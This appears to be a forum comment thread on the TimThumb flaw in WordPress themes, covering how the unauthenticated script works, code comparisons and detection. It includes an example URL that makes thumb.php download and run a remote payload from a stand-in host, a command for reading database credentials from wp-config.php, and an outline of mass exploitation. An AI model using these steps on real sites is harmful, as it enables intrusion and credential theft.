Zero Day Vulnerability in many Wordpress Themes

You could also "cat /usr/local/wordpress/wp-config.php" and see the plaintext mysql username/password and inject malicious data into the DB, create/drop tables or databases depending on access level.

Problem is that then you can't auto install themes, auto update wordpress - and the script causing this vulnerability requires a writable cache directory under the wordpress root.

Errm, you should probably do that today - and check for the presence of base64 encoded images - now that you told the world about it ;)

While it's concise and not overly dramatic, lots of people run Wordpress on shared hosting. That generally means they don't have SSH access and the instructions are harder to follow... It needs a "for beginners" section on how to check and accomplish the steps.

I invest time in doing things like looking over any third party libraries for stuff like this, too. The quality of the average WordPress plugin is quite low, and I'm surprised we don't hear about issues like this more often.

Thanks really interesting read!

This is a vulnerability in a third party script often used in Wordpress themes. It's not related to Wordpress.com.

I have a version that does this:

   function clean_source ( $src ) {

    // remove http/ https/ ftp
    $src = preg_replace("/^((ht|f)tp(s|):\/\/)/i", "", $src);
    // remove domain name from the source url
    $host = $_SERVER["HTTP_HOST"];
    $src = str_replace($host, "", $src);
    $host = str_replace("www.", "", $host);
    $src = str_replace($host, "", $src);

This version doesn't allow external sources at all by the look of it.

Exactly what I thought upon reading "The current version of timthumb has this issue. Since it’s already in the wild and I just got hacked by it, I figure it’s ok to release the vulnerability to the general public."

That's not really possible. There are well over 1,000 different theme authors in the WordPress theme directory alone.

No, you can execute the script directly if you know or can guess the location of it, straight through your web browser.

Accessing

  http://www.example.com/wordpress/wp-content/ themes/vulnerable-theme/thumb.php?src=flickr.com.example.org/payload.php 

is sufficient to cause it to download payload.php and cache it. Afterwards, you can access the PHP file in the same manner to execute it.

One could trivially make a list of signatures for vulnerable themes (for example, all the ones I paid for from a certain prominent Wordpress themes company), and then exploit any website whose main page matched a signature. Alternatively, you could just speculatively hit a few hundred URLs on every domain you found.

No. The timthumb.php script can be accessed directly by unauthenticated users.

I had a few copies from old WooThemes themes as well, and the copy of thumb.php included didn't have such an external sites list/feature either.

What version are you running?

Wordpress gets no opportunity to execute a single line of code at any point in this process. TimThumb can be executed without needing to go through Wordpress at any point. The only relevance of Wordpress to this is that many Wordpress themes happen to ship with TimThumb. If you have a Wordpress theme installed on your server (note: activation not required!) which ships with it, you are vulnerable.

Wordpress could theoretically intercept calls to PHP files below its own root, but that would be a breaking change for a LOT of code and sites.

The problem is that timbthumb.php is usually contained within themes or plugins. There's quite a few small php libraries with little insecurities dotted all around the web and sometimes theme and plugin developers tend to use a version and stick with it.

Realistically the best thing that could happen is that plugins like WP-Security Scan could check for timbthumb.php's presence and warn you.

timthumb executes outside of wordpress, it's directly called via the the url